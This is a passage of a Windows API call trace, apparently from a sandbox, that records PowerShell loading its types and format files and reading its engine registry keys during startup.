	[0501.828] GetFileType (hFile=0x324) returned 0x1
	[0501.828] SetErrorMode (uMode=0x1) returned 0x1
	[0501.828] GetFileType (hFile=0x324) returned 0x1
	[0501.830] ReadFile (in: hFile=0x324, lpBuffer=0x2d2b438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2b438*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.833] ReadFile (in: hFile=0x324, lpBuffer=0x2d2b438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2b438*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.833] ReadFile (in: hFile=0x324, lpBuffer=0x2d2b438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2b438*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0501.834] ReadFile (in: hFile=0x324, lpBuffer=0x2d2b438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2b438*, lpNumberOfBytesRead=0x14d2c8*=0xcf3, lpOverlapped=0x0) returned 1
	[0501.834] ReadFile (in: hFile=0x324, lpBuffer=0x2d2a893, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2a893*, lpNumberOfBytesRead=0x14d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0501.834] ReadFile (in: hFile=0x324, lpBuffer=0x2d2b438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2d2b438*, lpNumberOfBytesRead=0x14d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0501.837] CloseHandle (hObject=0x324) returned 1
	[0501.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0501.842] SetErrorMode (uMode=0x1) returned 0x1
	[0501.842] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d240 | out: lpFileInformation=0x14d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0501.842] SetErrorMode (uMode=0x1) returned 0x1
	[0501.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0501.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x324) returned 0x0
	[0501.844] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d2ac, lpData=0x0, lpcbData=0x14d2a8*=0x0 | out: lpType=0x14d2ac*=0x1, lpData=0x0, lpcbData=0x14d2a8*=0x56) returned 0x0
	[0501.844] CoTaskMemAlloc (cb=0x5a) returned 0x1b958f90
	[0501.844] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d27c, lpData=0x1b958f90, lpcbData=0x14d278*=0x56 | out: lpType=0x14d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d278*=0x56) returned 0x0
	[0501.844] CoTaskMemFree (pv=0x1b958f90) 
	[0501.845] RegCloseKey (hKey=0x324) returned 0x0
	[0501.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0501.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0503.281] GetSystemInfo (in: lpSystemInfo=0x14bf60 | out: lpSystemInfo=0x14bf60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0503.282] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0503.296] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0503.296] GetFileType (hFile=0x320) returned 0x1
	[0503.296] SetErrorMode (uMode=0x1) returned 0x1
	[0503.297] GetFileType (hFile=0x320) returned 0x1
	[0503.297] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.297] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.298] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.299] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.299] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.300] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.300] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.300] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.300] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.300] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.301] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.301] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.302] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.302] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.303] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.303] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.303] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.303] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.303] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.304] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.304] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.304] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.304] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.305] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.305] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.305] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.305] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.305] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.308] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.308] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.308] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.308] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.309] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.309] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.309] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.309] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1000, lpOverlapped=0x0) returned 1
	[0503.309] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x1b4, lpOverlapped=0x0) returned 1
	[0503.310] ReadFile (in: hFile=0x320, lpBuffer=0x2c020e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d2c8, lpOverlapped=0x0 | out: lpBuffer=0x2c020e0*, lpNumberOfBytesRead=0x14d2c8*=0x0, lpOverlapped=0x0) returned 1
	[0503.310] CloseHandle (hObject=0x320) returned 1
	[0503.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0503.310] SetErrorMode (uMode=0x1) returned 0x1
	[0503.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d240 | out: lpFileInformation=0x14d240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0503.310] SetErrorMode (uMode=0x1) returned 0x1
	[0503.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0503.310] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x320) returned 0x0
	[0503.310] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d2ac, lpData=0x0, lpcbData=0x14d2a8*=0x0 | out: lpType=0x14d2ac*=0x1, lpData=0x0, lpcbData=0x14d2a8*=0x56) returned 0x0
	[0503.311] CoTaskMemAlloc (cb=0x5a) returned 0x1b959150
	[0503.311] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d27c, lpData=0x1b959150, lpcbData=0x14d278*=0x56 | out: lpType=0x14d27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d278*=0x56) returned 0x0
	[0503.311] CoTaskMemFree (pv=0x1b959150) 
	[0503.311] RegCloseKey (hKey=0x320) returned 0x0
	[0503.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0503.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0504.624] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0504.635] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0505.087] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0505.088] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0505.461] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0505.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.461] CoTaskMemFree (pv=0x3ada70) 
	[0505.477] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d4c8 | out: phkResult=0x14d4c8*=0x320) returned 0x0
	[0505.478] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d4dc, lpData=0x0, lpcbData=0x14d4d8*=0x0 | out: lpType=0x14d4dc*=0x1, lpData=0x0, lpcbData=0x14d4d8*=0x74) returned 0x0
	[0505.478] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d44c, lpData=0x0, lpcbData=0x14d448*=0x0 | out: lpType=0x14d44c*=0x1, lpData=0x0, lpcbData=0x14d448*=0x74) returned 0x0
	[0505.478] CoTaskMemAlloc (cb=0x78) returned 0x3702b0
	[0505.478] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x14d41c, lpData=0x3702b0, lpcbData=0x14d418*=0x74 | out: lpType=0x14d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d418*=0x74) returned 0x0
	[0505.478] CoTaskMemFree (pv=0x3702b0) 
	[0505.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0505.478] SetErrorMode (uMode=0x1) returned 0x1
	[0505.478] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0505.478] SetErrorMode (uMode=0x1) returned 0x1
	[0505.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0505.480] SetErrorMode (uMode=0x1) returned 0x1
	[0505.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0505.480] SetErrorMode (uMode=0x1) returned 0x1
	[0505.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0505.480] SetErrorMode (uMode=0x1) returned 0x1
	[0505.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d3a0 | out: lpFileInformation=0x14d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0505.480] SetErrorMode (uMode=0x1) returned 0x1
	[0505.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
